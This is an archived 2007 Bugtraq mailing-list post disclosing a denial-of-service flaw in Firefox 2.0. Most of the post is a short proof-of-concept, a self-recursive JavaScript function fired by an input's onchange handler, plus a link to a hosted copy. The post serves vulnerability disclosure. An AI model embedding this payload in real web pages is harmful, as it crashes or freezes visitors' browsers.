lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
This website is powered by Openwall GNU/*/Linux security-enhanced OS
[<prev] [next>] [thread-next>] [month] [year] [list]
Date: Mon,  1 Jan 2007 20:43:34 +0100
From: sapheal@...k.pl
To: bugtraq@...urityfocus.com
Subject: Mozilla Firefox 2.0 denial of service vulnerability

PoC exploit:

<script>
function owned(){

setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">



It is available under the following address:
http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html




Kind regards,

Michal Bucko (sapheal)
HACK.PL

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux